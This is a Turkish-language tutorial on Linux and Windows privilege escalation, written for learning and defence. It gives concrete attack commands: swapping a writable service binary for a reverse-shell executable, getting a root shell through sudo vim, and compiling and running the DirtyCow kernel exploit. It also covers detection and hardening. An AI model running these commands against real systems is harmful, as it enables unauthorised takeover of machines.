1. Giriş
Bir siber saldırı genellikle tek bir adımda gerçekleşmez. Saldırgan, sisteme ilk giriş yaptığında çoğunlukla düşük ayrıcalıklı kullanıcı yetkilerine sahip olur. Ancak gerçek hedef, root (Linux) veya Administrator/SYSTEM (Windows) yetkilerine ulaşmaktır. Bu sürece Privilege Escalation (Ayrıcalık Yükseltme) denir.
Saldırgan için: Sistemin tamamını kontrol etmek.
Savunmacı için: Bu yükselme yollarını kapatmak ve tespit etmek.
2. Privilege Escalation Türleri
- Local Privilege Escalation (LPE): Sisteme erişim zaten vardır, fakat daha yüksek yetkilere çıkılır.
- Remote Privilege Escalation (RPE): Uzaktan, genellikle exploit yoluyla doğrudan yüksek yetkiler elde edilir.
- Vertical Escalation: Kullanıcı → Admin geçişi.
- Horizontal Escalation: Aynı seviyede başka bir kullanıcı hesabına geçiş.
3. Laboratuvar Ortamı Kurulumu
Kendi deneme ortamınızı kurarak bu teknikleri güvenli bir şekilde test edebilirsiniz:
- Linux: Ubuntu/Debian (zayıf sudoers ayarları ile).
- Windows: Windows 10 / Windows Server (test amaçlı VM).
- Araçlar:
- Linux için:
linpeas.sh,linenum.sh,pspy - Windows için:
winPEAS.exe,PowerUp.ps1 - Ek olarak:
Metasploit,Sysinternals Suite,auditd
- Linux için:
4. Windows Privilege Escalation Teknikleri
4.1 Misconfigured Services
# Servis bilgilerini kontrol et
sc qc VulnerableService
# Servisin binary path'ine yazma yetkisi var mı kontrol et
icacls "C:\Program Files\VulnApp\service.exe"
Eğer normal kullanıcı Modify iznine sahipse, dosyayı zararlı exe ile değiştirip servisi yeniden başlatabilir:
sc stop VulnerableService
copy C:\Malware\reverse.exe "C:\Program Files\VulnApp\service.exe"
sc start VulnerableService
4.2 Unquoted Service Path
# Servis yolu kontrolü
sc qc UnquotedService
Çıktı:
BINARY_PATH_NAME: C:\Program Files\Vulnerable Service\app.exe
Saldırgan C:\Program.exe dosyası koyarsa, servis çalışırken önce bu dosya çalışır.
4.3 Registry Exploitation
# Registry izinlerini kontrol et
reg query HKLM\System\CurrentControlSet\Services\VulnService
4.4 Scheduled Tasks Manipulation
# Tüm görevleri listele
schtasks /query /fo LIST /v
Görev Administrator olarak çalışıyor ama herkesin yazma hakkı varsa → zararlı komut eklenebilir.
5. Linux Privilege Escalation Teknikleri
5.1 SUID Bit Abuse
# SUID dosyalarını bul
find / -perm -4000 -type f 2>/dev/null
Örnek:
vim -c ':!sh'
5.2 Weak Sudoers Config
sudo -l
Örnek çıktı:
User hacker may run the following commands:
(ALL) NOPASSWD: /usr/bin/vim
sudo vim -c ':!sh'
5.3 Kernel Exploits
uname -a
Çıktı:
Linux vulnbox 4.4.0-21-generic
DirtyCow exploit örneği:
gcc dirtycow.c -o dirtycow -pthread
./dirtycow
5.4 World-Writable Files
find / -writable -type f 2>/dev/null
6. Otomatik Araçlarla Tespit
- Linux:
./linpeas.sh
./linenum.sh
- Windows:
winPEAS.exe
Import-Module .\PowerUp.ps1
Invoke-AllChecks
7. Gerçek Senaryo (Case Study)
- Normal kullanıcı olarak sisteme giriş.
sudo -lile zayıf sudoers tespiti.sudo vim -c ':!sh'ile root shell elde etme.
8. Detection & Monitoring
Linux – auditd kuralı:
auditctl -a always,exit -F arch=b64 -S execve
Windows – Sysmon ile izleme:
Servis, registry ve scheduled tasks değişikliklerini loglamak için özel konfig kullanılabilir.
9. Önleme & Best Practices
- Least Privilege prensibi uygulayın.
- Kernel ve uygulamaları güncel tutun.
- SUID dosyalarını kaldırın:
chmod u-s /usr/bin/vim
- Servis yollarını tırnak içine alın.
- SIEM üzerinde korelasyon kuralları yazın.
10. Sonuç
Privilege Escalation, saldırganın sistem üzerinde tam kontrol kazanmasını sağlar. Güvenlik ekipleri için bu adımı anlamak ve önlem almak kritik önemdedir.
Bu makaledeki adımları sadece test laboratuvarınızda uygulayarak saldırı yollarını öğrenebilir ve kendi sistemlerinizi güçlendirebilirsiniz.



Yorum bırakın